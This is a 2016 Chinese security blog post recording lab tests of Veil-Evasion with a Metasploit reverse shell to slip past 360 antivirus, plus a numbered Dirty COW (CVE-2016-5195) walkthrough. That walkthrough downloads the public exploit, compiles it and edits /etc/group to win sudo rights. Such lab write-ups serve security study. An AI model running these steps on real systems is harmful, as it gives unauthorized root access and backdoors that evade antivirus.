最新消息:

手工测试Veil-Evasion过360和Dirty COW(内附视频)

Kali Linux demon 3535浏览 0评论

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?手工测试Veil-Evasion和Dirty COW

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 前言—-(先是一堆废话)

由于群里有小伙伴问我,测试Dirty COW出现的各种蛋疼的问题,索性我将我当时做的视频发出来,网上也有很多相关的类是资料,我这里就不详细描述了(文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用

手工测试(视频一)veil?Evasion

手工测试Eternal的veil-Evasion,通过veil-Evasion生成免杀木马和Metasploit反弹shell 来结合,能大部分绕过防火墙和360,最后经过NFTS数据流隐藏的特性进行隐藏。

本地搭建实验环境:360(五引擎,已打上各种补丁)

自己的笔记本:win8.1

本地虚拟机:kali linux 2.0
本地虚拟机:xp SP3

在veil-Evasion中11号的模块中,本人测试了一下 ,发现生成了4kb的木马,依然能运行绕过360,但是有可能躲不过360的云查杀机制。

参考资料 : http://www.secist.com/archives/1107.html? ? ? 免杀后门之MSF&Veil-Evasion的完美结合。

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?视频二(Dirty COW)

本地搭建实验环境:

本地 虚拟机:kali linux 2.0(内核4.6)

 

1. service ssh start
2. ssh 用户名@localhost

1和2 开启ssh通道 ,不会开启linux 的ssh 请自行百度

3. wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

下载 exp

4  gcc -pthread dirtyc0w.c -o dirtyc0w

编译生成 ?dirtyc0w.c

5 ./dirtyc0w /etc/group "$(sed '/\(sudo*\)/ s/$/,用户名/' /etc/group)"

执行 提权代码

6. exit

退出当前用户

7. sudo  su

提权超级用户权限

8. cat /etc/group |grep sudo

使用这命令参数来查看这个group下的 sudo的用户权限? ,我们可以对比下提权前和提权后的用户权限

nwh2n3i2d2c2rf8f7 828y2_eqkh74ydsi

最后发现 demon这个用户已经是管理员的权限了

(对比用户的权限)

kp42vt9wggwus_r65 z3fyksfkof62zskpf

提权后的用户权限:

7ubpru7wnuhf3_rw65l9

提权之前 和提权之后的权限对比:

4ggqwflijo_xsrkx83i5fnfil7weiel684kgy

并附上黑手kali ?也同样:

20161024_224010-624x1081

 

参考资料:http://www.secist.com/archives/1489.html? ?【漏洞预警】CVE-2016-5195脏牛漏洞:Linux内核通杀提权漏洞(10.21 13:41更新)

以上视频都是在Eternal群主发出这些文章不久后录制的,就想着手工验证一下,录制比较随意,大伙就凑合着看吧.本人菜鸟,若是哪里不妥,及时在即刻群@我,我一定及时更正完善该文章,谢谢!

 

demon ? ? ? ? ? ? ? ? ?2016.10.31 更

转载请注明:即刻安全 » 手工测试Veil-Evasion过360和Dirty COW(内附视频)

您必须 登录 才能发表评论!

网友最新评论 (1)

  1. 关于 部分浏览器看不了的视频,我已经打包上传了 链接:http://pan.baidu.com/s/1jIRVg4Q 密码:gf53
    demon3年前 (2016-11-02)


合作伙伴